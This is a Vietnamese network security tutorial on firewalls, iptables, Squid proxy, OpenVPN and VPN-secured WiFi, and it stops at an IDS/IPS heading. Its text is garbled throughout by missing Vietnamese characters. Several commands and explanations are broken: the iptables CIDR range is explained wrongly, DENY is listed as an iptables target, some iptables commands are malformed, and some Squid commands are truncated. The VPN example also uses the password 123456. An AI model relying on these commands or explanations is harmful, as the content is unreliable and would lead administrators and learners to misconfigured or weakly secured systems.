B lc packet cho php hay t chi mi packet m n nhn c. N kim tra ton b
on d liu quyt nh xem on d liu c tha mn mt trong s cc lut l ca
lc packet hay khng. Cc lut l lc packet ny l da trn cc thng tin u mi
packet (header), dng cho php truyn cc packet trn mng. Bao gm:
a ch IP ni xut pht (Source)
a ch IP ni nhn ( Destination)
Nhng th tc truyn tin (TCP, UDP, ICMP, IP tunnel )
Cng TCP/UDP ni xut pht
Cng TCP/UDP ni nhn
Dng thng bo ICMP
Giao din packet n
Giao din packet i
Firewall c th bc tch d liu trong gi tin Layer 6,7: Filetype, URL, Content,
Services, Application, User,..
d. Cc loi Firewall
Nu chia theo v tr t:
- Network Firewall: bo v cho c h thng mng
- Host Firewall: Bo v cho mt my tnh c ci t (thng c tch hp
trn OS hoc cc phn mm bo mt nh Anti-Virus, Endpoint Security).
- Web Firewall: C th l Network Firewall hoc Host Firewall c chc nng
bo v dch v web trc cc dng tn cng.
Nu theo nn tng hardware v software
- Software Firewall: Thng c ci t trn OS hoc l h iu hnh Linux tch
hp firewall mm
- Hardware Firewall: c ti u ha bng vic xy dng h iu hnh trn nn
tng phn cng ca hng nn hiu nng x l tt hn.
Nu theo kh nng x l gi tin
- Packet Filter: Hot ng Layer3 4 M hnh OSI. Cho php lc gi tin hai
lp ny, Firewall dng ny c th coi nh Acess Control List trn Router.
7, 2012
- Application Filter: Hot ng Layer 7. Cho php to ra cc Rules hot ng

trn Layer 7 ca m hnh mng OSI nh URL, Content.
- State Full Filter: Hot ng t Layer 3 7: Cho php to rules phc to t IP,
Port, URL, Filetype, time, User, content, Header,
- UTM: Tch hp gia Firewall v UTM. Do nhiu tnh nng nn hiu nng x l
khng c cao.
Khi nim mi v mt th h mi Firewall c Gartner (t chc nh gi cc gii php
IT) nh ngha l: Next Generation Firewall cn phi c cc tnh nng sau:
-
H tr hot ng Inline trong h thng mng (c th hot ng trong sut t Layer 2)
C nhng tnh nng Firewall c bn: Packet Filter, NAT, Statefull, VPN
H tr pht hin h thng mng (Host active, Service, Application, OS, Vulnerability).
Tch hp IPS mc su (cho php cu hnh, rule edit, Event Impact Flag)
Application Awareness: Cho php pht hin cc dch v h thng, a ra cc policy su

nh cm c Skype, Yahoo Messager
Extrafirewall Inteligence: V d cho php block mt user no ng nhp vo

Facebook cn cc user cn li vn truy cp c.
H tr update signature lin tc m bo h thng lun c bo mt.
Gartner a ra khi nim v Firewall v l tnh nng ca cc firewall hin nay, rt

nhiu sch ti c thy cha h a khi nim ny vo trong khi thc t trin khai
rt nhiu h thng ny.
e. Thit k Firewall trong m hnh mng
Thit k firewall ph hp vi h thng mng l rt quan trng, di y ti trnh by mt
s m hnh trin khai firewall:
Router lm chc nng Packet Filter
Firewall p dng cho vng DMZ
M hnh mng tch hp ti mt n v (v d)
7, 2012
7, 2012
M hnh mng tch hp Firewall v d khc

-
Trong m hnh ny c thit b: Firewall, Proxy chuyn dng ca BlueCoat, IPS

Sourcefire, Cn bng ti cho nhiu ng internet, UTM Firewall cng nhiu thit b v
gii php bo mt khc.
7, 2012
6. Cu hnh firewall IPtable trn Linux

Trong h thng Unix/Linux c rt nhiu Firewall...Trong s c mt Firewall c cu hnh
v hot ng trn nn Console rt nh v tin dng = = > l Iptables. Bi vit ny khng c
nh trnh by chi tit v cch s dng Iptables. Nhng ti hy vng l qua n bn c th phn
no hiu v cu hnh c Iptables mc c bn...
Trc ht bn cn phi hiu Firewall Iptables s x l nh th no i vi nhng packets
leaving, entering hay passing i vo hay i ra t PC.
- Bt k Packet no mun i vo PC ca bn u phi i qua Input Chain.
- Bt c Packet no t PC ca bn mun i ra ngoi Network u phi i qua Output Chain.
7, 2012
- Bt c Packet no m PC ca bn mun gi i mt Destination khc u phi i qua Forward

Chain
Tt c nhng iu nu trn u c gim st bi Iptables...V tt nhin l Iptables phi
c ci t v thit lp :-) Vic thit lp cu hnh cho Input Chain, Output Chain v Forward
gi l thit lp ni quy (rules) cho Firewall. Hu ht Iptables c ci t trong nhn ca mt
s Version Linux thng dng hin nay: Redhat, Mandrake, SuSe..
Nu khng bn c th tm thy Iptables :
http://www.linuxapps.com/
http://www.linuxapps.com/
http://www.freshmeat.net/
Mt s cu hnh n gin
Mt s Port v Service thong dng trn mt h thng Unix/Linux:
Port
21
22
23
25
53
79
80
110
111
443
901
1024
3306
6000
Protocol
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
Service
FTP
SSH
TELNET
SMTP
NAME (DNS)
FINGER
HTTP
POP3
SUNRPC
HTTPS
SAMBA-SWAT
KDM
MYSQL
X11
By gi chng ta bt u tm hiu nhng chc nng v cch cu hnh c bn ca Iptables.

V d: Khi PC ca bn send mt Packet n http://www.yahoo.com/ yu cu hi p trang
HTML. Th trc ht n phi c chuyn qua Output Chain. Lc ny cc ni quy (rule) s
hot ng, n s kim tra yu cu Send Packet. Nu yu cu hp l th Packet s c i.
7, 2012
Tip khi Yahoo Reply Packet v my bn th n cng s phi i qua Input Chain. ng
nhin l n phi ph hp c vi cc Rule th mi c vo my ca bn. Rc ri v phc tp
c y nh hi quan Ni Bi Air Port phi khng ?
Chng ta bt u thao tc vi nhng a ch IP nht nh. Chng hn nh bn mun ngn chn
tt c cc Packet n t 192.78.4.0
-s l tu chn ngn chn mt a ch IP hay DNS ngun. Tng t ta c dng lnh:
iptables -s 192.78.4.0
Nu bn mun x l cc Packet mt cch chi tit hn. Th tu chn -j s gip bn thc hin iu
nh: ACCEPT, DENY hay DROP (s dng kt hp vi tu chn -s nh)...Chc ti khng
cn phi a ra ngha ting vit ca 3 t ACCEPT, DENY, DROP na nh. Nu bn mun
DROP cc Packet t a ch 192.78.4.0 :
iptables -s 192.78.4.0 -j DROP
DENY hay ACCEPT cng tng t nh ;-p
Lnh n trn s b qua mi th n t 192.78.4.0
Chng ta cn c th b qua mt PC nht nh trn mt mng. Nu bn khng mun nhng PC
trong mng lin lc v ni chuyn vi PC hay lin lc ra ngoi. Bn ch cn thay i tham s
Input, Output v thay i tu chn -s, -d
Nu chng ta mun b qua yu cu phn hi Telnet t my PC ny. Trong trng hp ny c t
nht 3 giao thc c th c ch r: TCP, UDP v ICMP.
Tu chn -p c s dng ch r chi tit giao thc cn x l. Telnet l mt giao thc hot
ng trn Port 23/TCP ln chng ta s c dng lnh:
iptables -A INPUT -s 192.78.4.0 -p tcp --80 telnet -j DROP
Cc Command trn l thao tc cho 1 a ch IP (Single IP). Nu bn mun thao tc vi nhiu a
ch IP cng mt lc (Multi IP) th s c cht thay i nh nh sau:
- 192.78.4.0/84 = = > Tt cc cc IP t 192.78.4.0 cho n 192.78.4.84
7, 2012
- 192.78.4.* = = > Tt c cc IP thuc lp mng D. T 192.78.4.0 cho n 192.78.4.255

Cu hnh phc hp ln mt cht (mt cht thi nha)
Bn c mt mng LAN v c mt kt ni Internet. Chng ta s nht tr coi LAN l eth0 cn
kt ni Internet l ppp0.
Bn mun cho php dch v Telnet chy trn cc PC trong mng LAN nhng khng mun cho
n hot ng ngoi Internet (v nhng l do an ton). ng lo Iptables s lo cho bn iu
ny. Bn c th s dng tu chn -i v -o. Cch ngn chn trn Output Chain t ra hp l hn
l cch ngn chn Input Chain. Bn c th s dng thm tu chn -i
iptables -A INPUT -p tcp --destination-port telnet -i ppp0 -j DROP
Command trn s ngn chn tt c cc yu cu, nguy c tn cng bng Telnet t bn ngoi vo
h thng LAN ca bn.
Nu bn bit c cc Packet s dng nhng Protocol nht nh, nu n l TCP th bn cng
c th d dng bit c Port m n s dng. Khi hai PC kt ni vi nhau qua giao thc TCP.
Th trc tin kt ni phi c khi to trc. y l cng vic ca mt gi SYN. Mt SYN
Packet s lm nhim v ni vi mt PC khc rng n sng sng kt ni. By gi ch mt
PC i hi gi mt SYN Packet. Nu bn ngn chn nhng gi SYN vo. N s Stop cc PC
khc t nhng Service ang c Open. iu c ngha l n s ngn chn c cc PC trong
LAN ca bn vi cc PC ngoi Internet:
iptables -A INPUT -i ppp0 -p tcp --syn -j DROP
Nu bn vn mun duy tr mt Service nhng li khng mun cc PC ngoi Internet truyn
thng vi n. Ch cho cc PC trong LAN truyn thng vi nTh bn c th ngn chn tt cc
SYN Packet trn Port ca Service :
iptables -A INPUT -i ppp0 -p tcp --syn --destination-port ! 80 -j DROP
Theo mc nh th Input Chain v Output Chain lun c cu hnh ch Accept. Cn
Forward lun c thit lp ch Deny. Nu bn mun s dung Server v Firewall nh
mt Router. Bn phi cu hnh cho Forward ch Accept
7, 2012
Hin trn Internet c rt nhiu Script cu hnh Rules cho Iptables rt tuyt. Bn c th Down
chng v p dng ngay trn h thng ca mnh lun. Cng c mt s cng c cu hnh Iptables
trn X .
Li kt
Bo mt lun l mt vn phc tp tn nhiu giy mc. Hy vng qua bi vit ny bn s hiu
v nm c cch s dng Iptables. Mi th u ch mang tnh cht tng i. V vy nu
mun giu cho h thng ca mnh an ton. Bn lun phi xem xt kim tra Firewall, cc
Bug...V lun trng thi trc chin mc cao nht...
7. Ci t v cu hnh SQUID lm Proxy Server
a. Linux SQUID Proxy Server:
-
Squid l mt proxy server, kh nng ca squid l tit kim bng thng(bandwidth), ci

tin vic bo mt, tng tc truy cp web cho ngi s dng v tr thnh mt trong
nhng proxy ph bin c nhiu ngi bit n. Hin nay, trn th trng c rt nhiu
chng trnh proxy-server nhng chng li c hai nhc im, th nht l phi tr tin
s dng, th hai l hu ht khng h tr ICP ( ICP c s dng cp nht nhng thay
i v ni dung ca nhng URL sn c trong cache l ni lu tr nhng trang web m
bn tng i qua ). Squid l s la chn tt nht cho mt proxy-cache server, squid p
ng hai yu cu ca chng ta l s dng min ph v c th s dng c trng ICP.
Squid a ra k thut lu tr cp cao ca cc web client, ng thi h tr cc dch

v thng thng nh FTP, Gopher v HTTP. Squid lu tr thng tin mi nht ca cc
dch v trn trong RAM, qun l mt c s d liu ln ca cc thng tin trn a, c mt
k thut iu khin truy cp phc tp, h tr giao thc SSL cho cc kt ni bo mt thng
qua proxy. Hn na, squid c th lin kt vi cc cache ca cc proxy server khc trong
vic sp xp lu tr cc trang web mt cch hp l.
Sau y chng ta s thc hin cch thc ci t mt Proxy server nh th no.
b. Ci t:
-
u tin chng ta nn c mt s khi nim v i hi phn cng ca mt proxy server:
7, 2012
*** Tc truy cp a cng : rt quan trng v squid thng xuyn phi c v

ghi d liu trn cng. Mt a SCSI vi tc truyn d liu ln l mt ng c vin tt
cho nhim v ny.
*** Dung lng a dnh cho cache ph thuc vo kch c ca mng m Squid
phc v. T 1 n 2 Gb cho mt mng trung bnh khong 100 my. Tuy nhin y ch l mt
con s c tnh cht v d v nhu cu truy cp Internet mi l yu t quyt nh s cn thit
ln ca a cng.
*** RAM : rt quan trng, t RAM th Squid s chm hn mt cch r rng.
*** CPU : khng cn mnh lm, khong 133 MHz l cng c th chy tt vi ti
l 7 requests/second.
-
Ci t Squid vi RedHat Linux rt n gin. Squid s c ci nu bn chn n trong

qu trnh ci t ngay t u. Hoc nu bn ci Linux khng Squid, bn c th ci sau
qua tin ch rpm vi lnh :
rpm i tn_gi_Squid
Khi squid s c ci v bn c th bc qua phn cu hnh squid.
Cc th mc mc nh ca squid:
/usr/sbin
/etc/squid
/var/log/squid
Ci t t source :
+ Ta c file source ca squid l squid-version.tar.gz, ta thc hin cc bc lnh
sau:
tar xzvf squid-version.tar.gz
cd squid-version
7, 2012
./configure
make
make install
Sau khi ta thc hin cc lnh trn, coi nh ta ci t xong squid.
c.
Cu hnh Squid:
- Sau khi ci t xong squid, ta phi cu hnh squid ph hp vi tng yu cu ring. Ta

cu hnh mt s tham s trong file /etc/squid/squid.conf nh sau:
** http_port: mc nh l 3128.
** icp_port: mc nh l 3130.
** cache_dir: khai bo kch thc th mc cache cho squid, mc nh l:
cache_dir /var/spool/squid/cache 100 16 256
Gi tr 100 tc l dng 100MB lm cache, nu dung lng a cng ln, ta
c th tng thm tu thuc vo kch thc a. Nh vy squid s lu cache trong th mc
/var/spool/squid/cache vi kch thc cache l 100MB.
** Access Control List v Access Control Operators: ta c th dng hai chc
nng trn ngn chn v gii hn vic truy xut da vo destination domain, IP address ca
my hoc mng. Mc nh squid s t chi phc v tt c, v vy ta phi cu hnh li tham s
ny. c vy, ta cu hnh thm cho thch hp vi yu cu bng hai tham s l : acl v
http_access.
V d: Ta ch cho php mng 172.16.1.0/24 c dng proxy server bng t kho src
trong acl.
acl MyNetwork src 172.16.1.0/255.255.255.0
http_access allow MyNetwork
7, 2012
http_access deny all

+ Ta cng c th cm cc my truy xut n nhng site khng c php bng t
kho dstdomain trong acl, v d:
acl BadDomain dstdomain yahoo.com
http_access deny BadDomain
+ Nu danh sch cm truy xut n cc site di qu, ta c th lu vo 1 file text, trong file
l danh sch cc a ch nh sau:
acl BadDomain dstdomain /etc/squid/danhsachcam
+ Theo cu hnh trn th file /etc/squid/danhsachcam l file vn bn lu cc a ch khng
c php truy xut c ghi ln lt theo tng dng.
+ Ta c th c nhiu acl, ng vi mi acl phi c mt http_access nh sau:
acl MyNetwork src 172.16.1.0/255.255.255.0
acl BadDomain dstdomain yahoo.com
http_access allow MyNetwork
+ Nh vy cu hnh trn cho ta thy proxy cm cc my truy xut n site
www.yahoo.com v ch c mng 172.16.1.0/24 l c php dng proxy. http_access
deny all: cm tt c ngoi tr nhng acl c khai bo.
7, 2012
Nu proxy khng th kt ni trc tip vi Internet v khng c a ch IP thc hoc proxy

nm sau mt Firewall th ta phi cho proxy query n mt proxy khc c th dng
Internet bng tham s sau :
cache_peer ITdep.hcmutrans.edu.vn parent 8080 8082
+ Cu hnh trn cho chng ta thy proxy s query ln proxy cha l

ITdep.hcmutrans.edu.vn vi tham s parent thng qua http_port l 8080 v icp_port l 8082.
-
Ngoi ra trong cng mt mng nu c nhiu proxy server th ta c th cho cc proxy

server ny query ln nhau nh sau:
cache_peer proxy2.hcmutrans.edu.vn sibling 8080 8082
cache_peer proxy3.hcmutrans.edu.vn sibling 8080 8082
sibling dng cho cc proxy ngang hng vi nhau.
d. Khi ng Squid:
-
Sau khi ci t v cu hnh li squid, ta phi to cache trc khi chy squid bng lnh:
squid z
Nu trong qu trnh to cache b li, ta ch n cc quyn trong th mc cache c

khai bo trong tham s cache_dir. C th th mc khng c php ghi. Nu c ta
phi thay i bng:
chown squid:squid /var/spool/squid
chmod 770 /var/spool/squid
Sau khi to xong th mc cache, ta khi ng v dng squid bng script nh sau:
/etc/init.d/squid star
/etc/init.d/squid stop
7, 2012
Sau khi squid khi ng, mun theo di v qun l vic truy cp ca cc client hay
nhng g squid ang hot ng cache nh th no, ta thng xuyn xem xt nhng file
sau y:
*** cache_log: bao gm nhng cnh bo v thng tin trng thi ca cache
*** store_log: bao gm nhng c s d liu v nhng thng tin g mi
c cp nht trong cache v nhng g ht hn
*** access_log: cha tt c nhng thng tin v vic truy cp ca client,
bao gm a ch ngun, ch n, thi gian
V phn Server ci t xong, cn v pha client, bn phi hiu chnh li cu hnh a

ch ca Server v port proxy ca Server, v d nh hnh sau:
7, 2012
8. Trin khai VPN trn nn tng OpenVPN

a. Tng quan v OpenVPN.
OpenVPN l mt cng c m ngun m c s dng xy dng mng ring o siteto-site (cc chi nhnh trong cng ty) vi giao thc SSL / TLS hoc vi cc kha chia s b mt
PSK (pre-share keys). N c vai tr bo m ng hm d liu thng qua mt cng TCP / UDP
trn mt mng khng an ton nh Internet, do cn thit lp mng ring o.
OpenVPN c th c ci t trn gn nh bt k nn tng bao gm c Linux, Windows
2000/XP/Vista, OpenBSD, FreeBSD, NetBSD, Mac OS X, v Solaris.
Cc h thng Linux cn phi c nhn linux kernel 2.4 hoc phin bn cao hn. Nguyn tc cu
hnh vn ging nhau trn bt k nn tng no.
OpenVPN da trn kin trc client / server. N phi c ci t trn cc thnh vin
VPN, c ch nh trong nhng my ch cng nh my khch.
OpenVPN to ra mt ng hm TCP hoc UDP, sau m ha d liu bn trong ng
hm.
S hiu cng mc nh ca OpenVPN l UDP 1194, da trn mt cng c gn bi t
chc cp pht s hiu Internet IANA (Internet Assigned Numbers Authority). Bn c th s
dng cng TCP hoc UDP t phin bn xut 2.0, mt cng c bit duy nht c th c s
dng cho mt s ng hm trn my ch OpenVPN.
Bn c th chn xy dng hoc Ethernet (Bridged) hoc IP (Routed) VPN vi s tr
gip tng ng ca trnh iu khin mng TAP hoc TUN. TAP / TUN c sn trn tt c cc nn
tng v c i km vi nhn Linux kernel 2.4 hoc cao hn.
Cc ty chn OpenVPN l c bit quan trng, v d my ch c th y cc tuyn
ng mng trn my khch hoc c th c s dng nh l my ch DHCP.
Khi s dng cc kha static, hai cng VPN chia s cng kha m v gii m d liu.
Trong trng hp ny, cc cu hnh s n gin nhng vn l bn cn phi a kha (trn
mt knh an ton) n ai m bn khng nht thit phi tin tng u kia ca ng hm.
7, 2012
H tng kha cng khai - Public Key Infrastructure (PKI) c s dng gii quyt vn
ny. N da trn vic, mi bn s hu hai kha, mt kha cng khai (Public Key) c bit
n vi tt c mi ngi v mt kho ring (Private Key) c gi b mt. Qu trnh ny c
s dng bi OpenSSL, min ph v l phin bn ngun m ca SSL, c tch hp trong
OpenVPN, xc thc cc VPN cng mc trc khi tin hnh m ha d liu.
Hy xem nhng u im ca hai ch :
OpenVPN mode
Pre-shared keys
SSL
Ch mt m
i xng
Bt i
xng
Thc hin
D dng
Kh khn
Tc
Nhanh
Chm
CPU s dng
Thp
Cao
Trao i kha
Khng
Thay i mi kha m
Khng
Xc thc thnh phn ngang Khng

hng
xng/i
b. Trin khai OpenVPN vi SSL trn mi trng Ubuntu linux

OpenVPN s dng kha cng khai Public Key Infrastructure (PKI) m ha bng thng
VPN gia cc node. Mt cch n gin ca vic thit lp mt VPN vi OpenVPN l kt ni
cc client thng qua mt interface cu ni trn my ch VPN. Hng dn ny s gi nh vi
mt node VPN, cc my ch trong trng hp ny, c cu hnh mt giao din cu ni.
Bc 1: Ci t OpenVPN.
ci t OpenVPN trong terminal ca ubuntu nhp:
sudo apt-get install openvpn
7, 2012
Bc 2: M hnh trin khai

M hnh trin khai VPN. Serer-PT lm my ch VPN server v Client PC-PT ng vai
tr l VPN client kt ni n Server thng qua Internet.
Server VPN ci t h iu hnh ubuntu server. Client ci t h iu hnh Ubuntu
desktop.
Bc 3: Thit lp Server Certificates
Sau khi ci t xong OpenVPN, ta s to certificates cho VPN server.

u tin, sao chp th mc easy-rsa n/etc/openvpn. iu ny s m bo rng bt k
thay i i vi cc kch bn s khng b mt khi cc gi phn mm c cp nht. Bn cng s
cn phi iu chnh cc iu khon trong th mc easy-rsa cho php ngi dng hin ti to
ra cc tp tin. T terminal nhp.
sudo mkdir /etc/openvpn/easy-rsa/

sudo cp -r /usr/share/doc/openvpn/examples/easy-rsa/2.0/* /etc/openvpn/easy-rsa/
sudo chown -R $USER /etc/openvpn/easy-rsa/
Tip theo, chnh sa /etc/openvpn/easy-rsa/vars theo thng tin ca bn:

export KEY_COUNTRY="VN"
export KEY_PROVINCE="NC"
export KEY_CITY="HANOI"
export KEY_ORG="NETPRO-ITI"
export KEY_EMAIL="chiennv@netpro.edu.vn"
Nhp to server certificates:
cd /etc/openvpn/easy-rsa/
source vars
./clean-all
#./build-ca
./build-key-server server
./build-dh
./pkitool --initca
./pkitool --server server
cd keys
openvpn --genkey --secret ta.key
sudo cp server.crt server.key ca.crt dh1024.pem ta.key /etc/openvpn/
7, 2012
7, 2012
Bc 4: thit lp client certificates

Cc VPN Client cng cn mt certificate xc thc n my ch. to ra certificate,
nhp chui sau y vo terminal:
cd /etc/openvpn/easy-rsa/
source vars
./pkitool hostname
Thay th hostname vi tn my thc t kt ni vi VPN
Sao chp cc tp tin sau y cho Client
/etc/openvpn/ca.crt
/etc/openvpn/easy-rsa/keys/hostname.crt
/etc/openvpn/easy-rsa/keys/hostname.key
/etc/openvpn/ta.key
Nh iu chnh tp tin cho hostname ca my Client

Tt nht l s dng phng php an ton sao chp cc certificate v key. Tin ch SCP
l mt la chn tt, nhng sao chp cc tp tin truyn thng cho Client cng c th lm vic
tt.
Bc 5: Cu hnh cho server
By gi cu hnh my ch OpenVPN bng cch to ra /etc/openvpn/server.conf t tp tin
example. Trong terminal nhp:
sudo cp /usr/share/doc/openvpn/examples/sample-config-files/server.conf.gz /etc/openvpn/
sudo gzip -d /etc/openvpn/server.conf.gz
iu chnh /etc/openvpn/server.conf thay i theo cu hnh di y:
local 192.168.78.128
7, 2012
dev tap0
[file ca filename.crt phai chuan /etc/openvpn/]
[cert,key cung tuong tu]
;up "/etc/openvpn/up.sh br0"
;down "/etc/openvpn/down.sh br0"
;server 10.8.0.0 255.255.255.0
server-bridge 192.168.78.128 255.255.255.0 192.168.78.50 192.168.78.100
push "route 192.168.78.128 255.255.255.0"
push "dhcp-option DNS 192.168.78.128"
;push "dhcp-option DOMAIN netpro.edu.vn"
tls-auth ta.key 0 # This file is secret
user nobody
group nogroup
log-append openvpn.log
verb 2
local: l ac h IP ca giao din cu ni.
server-bridge: cn khi cu hnh s dng cu ni. 172.18.100.101 255.255.255.0 l phn

giao din cu ni v mt n. Phm vi IP 172.18.100.105 172.18.100.200 l phm vi a
ch IP s c giao cho clients.
push: l ch th thm cc kt ni mng cho Client
user and group: cu hnh m ngi dng v nhm OpenVPN daemon thc hin
7, 2012
Thay th tt c cc a ch IP v tn min trn vi mng ca bn

Tip theo, to ra mt vi kch bn thm giao din khai thc cu ni. To /etc/openvpn/up.sh:
#!/bin/sh
BR=$1
DEV=$2
MTU=$3
/sbin/ifconfig $DEV mtu $MTU promisc up
/usr/sbin/brctl addif $BR $DEV
V /etc/openvpn/down.sh:
#!/bin/sh
BR=$1
DEV=$2
/usr/sbin/brctl delif $BR $DEV
/sbin/ifconfig $DEV down
Sau phn quyn:
sudo chmod 755 /etc/openvpn/down.sh
sudo chmod 755 /etc/openvpn/up.sh
V cu hnh my ch, khi ng li OpenVPN bng cch nhp:
sudo /etc/init.d/openvpn restart
Bc 6: Cu hnh cho client.
7, 2012
u tin ci OpenVPN cho Client:

sudo apt-get install openvpn
Sau vi cu hnh my ch v certificates ca client sao chp vo th mc /etc/openvpn/, to ra
mt tp tin cu hnh client bng cch sao chp cc example. Trong terminal ca my client nhp:
sudo cp /usr/share/doc/openvpn/examples/sample-config-files/client.conf /etc/openvpn
Thay i /etc/openvpn/client.conf theo cu hnh:
dev tap
remote 192.168.78.128 1194
cert hostname.crt
key hostname.key
tls-auth ta.key 1
Thay th vpn.example.com bng hostname my ch VPN ca bn, v hostname.* vi actual
certificate v key filenames.
Cui cng restart OpenVPN:
sudo /etc/init.d/openvpn restart
By gi bn c th kt ni mng Lan t xa vi VPN
7, 2012
9. ng dng VPN bo v h thng Wifi

a. Cc phng thc bo mt Wifi
Phn ny ti s trnh by gii php bo mt cho dch v Wi-Fi. Hin nay mng WiFi c s
dng rt rng ri nhng nhiu ngi cha hiu ht nhng l hng bo mt tn ti trong h thng
mng WiFi. Bi vit ny gii thiu cng ngh ng dng VPN vo bo mt mng WiFi.
Nhng tnh nng bo mt tch hp sn trn Access Point:
- Khng Broadcast SSID
Khng Broadcast SSID c th l mt gii php chng mt s k t m v hiu bit khng cao v
mng Wireless. i tng ny i khi cng khng nguy him. Ngoi ra SSID bt buc phi
truyn trn mi gi tin ca mng khng dy, SSID v MAC khng c m ha khi truyn thng
tin trn mng. Bt k mt cng c tn cng mng Wireless no u c th pht hin ra cc mng
khng Broadcast SSID
- MAC Address Filter
Tnh nng cu hnh trn Access Point ch cho php mt s a ch MAC nht nh truy cp ti
Access Point. , gii php ny c v c, nhng tht khng may hin nay rt nhiu tools cho
php tm gi tin ca mng Wireless, a ch MAC v SSID khng c m ha trn bt k gi
tin no v k tn cng d dng pht hin ra nhng a ch MAC c quyn truy cp ti Access
Point. Hin nay cng c rt nhiu Tools cho php gii mo a ch MAC.
- WEP
y l phng thc m ha s dng Share Key gia thit b v Access Point nhng rt tic
phng thc bo mt ny c rt nhiu Tools c th gii m gi tin v n chm Key.
- WPA
C v bo mt y, nhng tht khng may cc tool Crack Wireless mi nht hin nay nh Air
Crack h tr tn cng h thng mng Wireless s dng giao thc m ha ny.
Vy chng ta b tay sao
- Hin nay c mt gii php bo mt mng Wireless duy nht c th tin tng l s dng gii
php VPN.
- M hnh trin khai VPN cho Access Point nh hnh di y:
7, 2012
b. Thit lp cu hnh trn thit b Access Point v VPN Server 2003

- Cu hnh trn Access Point
- Cu hnh Enable tnh nng VPN trn my ch Windows Server 2003
- To kt ni VPN t cc thit b truy cp Wireless (Laptop).
- Ti s dng Access Point ca Linksys
- Thit b bao gm: 1 Port ra Internet, 4 Port LAN
- Cm dy t Switch vo Port Internet, ti khng cn quan tm ti 4 Port LAN
- Hon thnh cc bc trn ti truy cp vo Access Point bt u cu hnh, sau khi truy cp
vo Access Point qua giao din Web ti cu hnh a ch IP cho Access Point.
- Port Internet trn Access Point ti t a ch l: 192.168.50.33, cc thng s ti thit lp nh
trn Hnh di y.
- a ch IP lm Gateway cc thit b Wi-Fi ti t: 192.168.1.1
- a ch IP gn cho cc thit b kt ni ti Access Point l gii: 192.168.1.0/24
- Hon thnh cc bc trn ti cu hnh tnh nng Security cho cc kt ni Wi-Fi
Cu hnh bo mt:
- Chn Security Mode l: WPA2 Personal
- Chn thut ton m ha cho giao thc WPA l: TKIP+AES
- Key khi cc thit b mun kt ni ti mng Wireless ny l: vnexperts.net
7, 2012
7, 2012
- SSID ti l VNEXPERTS.NET
Save ton b cc thit lp ti ng t mt my tnh kt ni Wi-Fi ti Access Point ny.

7, 2012
- Dng chnh cng c trn Windows tm kim cc SSID ca mng Wireless. Ti thy c mng c
SSID l VNEXPERTS.NET nhn Connect g key nh va ri vo l hon thnh kt ni
Wireless
- Nhng sau khi kt ni chc chn bn vn cha truy cp c vo Internet
G Key truy cp
Hon tt kt ni
Cu hnh trn my ch vWindows Server 2003
7, 2012
7, 2012
Trong phn trc ca bi vit ti trnh by vi cc bn chi tit v cch thit lp mt my ch

Windows Server 2003 thnh my ch VPN Server qua cc bc c bn nht di y:
t a ch IP cho 2 card mng ca my ch
Enable tnh nng Routing and Remote Access
To User v Group cho php Group truy cp VPN
To Remote Access Policy cho php cc kt ni VPN
Gn a ch IP o cho cc kt ni VPN.
t a ch IP cho hai card mng ca my ch nh di y v da theo hnh u tin ca bi

vit ny:
- Card ni ra Internet th t Gateway
- Card ni vo Internal th khng cn t Gateway
Enable tnh nng Routing and Remote Access

Start
ri nhn Next ti ca s tip theo chn Custom Configuration chn nh hnh di y:
H thng yu cu c bt Service ny khng bn nhn Yes l hon thnh qu trnh
7, 2012
To User v Group cho php truy cp VPN

- My ch ca ti l Domain Controller (Khng nht thit Nu my ch cha l DC vn to
user v Group bnh thng). y ti to user vi tn vnexperts.net password t l 123456
- Nhn vo Tab Dial In kim tra nh di y l OK
7, 2012
7, 2012
Sau to mt Group vi tn VPN ri Add user vnexperts.net vo group ny hon thnh bc

ny
To Remote Access Policy cho php my ch thnh VPN Server
- Mc ch bc ny l cho php mt Group c thc hin mt kt ni VPN.
Chut phi vo Remote Access Policy chn New Remote Access Policy
7, 2012
Chn Custome ri g tn ca Remote Access Policy
Nhn Next h thng s yu cu iu kin cho php kt ni bn nhn Add ri chn ti Windows
Group
Nhn Add tip add Group m bn cho php thc hin kt ni VPN ti my ch ny.
Add Group VPN cho php truy cp
Nhn OK tip tc qu trnh

- Chn Grant cho php truy cp nhn Next ri Finish
7, 2012
7, 2012
Gn a ch IP cho nhng kt ni VPN

- Chut phi my ch chn Properties
- Chuyn sang Tab IP chn Options Static Address Pool
- Nhn Add gn di a ch IP cho cc kt ni VPN ti ti chn di
10.69.69.200 - 10.69.69.250 gn cho cc my truy cp VPN ti my ch ny.
7, 2012
Nhn OK hon thnh ton b qu trnh cu hnh trn my ch Routing and Remote Access.
c. To kt ni VPN t cc thit b truy cp qua Wifi
- Bc 1 va ri bn kt ni thnh cng ti mt mng WiFi nu khng s dng gii php
VPN th Access Point ca bn cm trc tip vo Modem ADSL l cc kt ni c th truy cp
ti Internet. Nhng nh vy s khng bo mt do mi m ha mt ln vi giao thc WPA v s
dng thut ton AES-TKIP. y bn c th s dng phng thc m ha WEP h tr cho
cc kt ni khng h tr giao thc WPA
- Trong gii php ny sau khi kt ni WiFi bn phi kt ni VPN na mi c th truy cp c
ra Internet. Vi ng dng VPN s dng m ha hai ln cho mt gi tin, ln 1 m ha vi WPA
ln 2 m ha tng IP vi PPTP hoc IPsec
- To kt ni VPN cho my kt ni Wi-Fi Thc hin vi Windows XP Professional

- Start / Control Panel / Network Connections / Chn New Connection Wirard
Ca s u tin nhn Next tip tc qu trnh.
Chn s dng kt ni VPN, nhn Next tip tc qu trnh
7, 2012
La chn VPN connections
Chn tn cho kt ni ti chn VNEXPERTS.NET
7, 2012
7, 2012
a ch IP ca my ch VPN Server ti g a ch 192.168.50.1 la a ch ca my ch VPN

Server va ri ti cu hnh. Nhn Next hon thnh qu trnh
Hon thnh qu trnh to mt kt ni VPN trn my tnh kt ni WiFi
7, 2012
Kt ni
- Nhn dp vo kt ni ti va to g User vnexperts.net nm trong Group VPN c php kt
ni VPN ti my ch VPN: 192.168.50.1 / Nhn Connect
Qu trnh Xc thc
7, 2012
Kim tra Truy cp vo trang web: vnexperts.net v kt qu tht tuyt vi
Trong bi vit ny ti gii thiu vi cc bn mt gii php Bo mt cc kt ni Wi-Fi. Khi mt

h thng bao gm cc my ch vi d liu ht sc quan trng nhiu doanh nghip khng gim
trin khai s dng gii php Wireless. Nhng vi ng dng VPN vo cc kt ni Wireless hon
ton bn c th tin tng c bi h thng c m ha hai tng.
10. H thng pht hin v ngn chn truy cp bt hp php IDS/IPS
a. Nguyn l phn tch gi tin
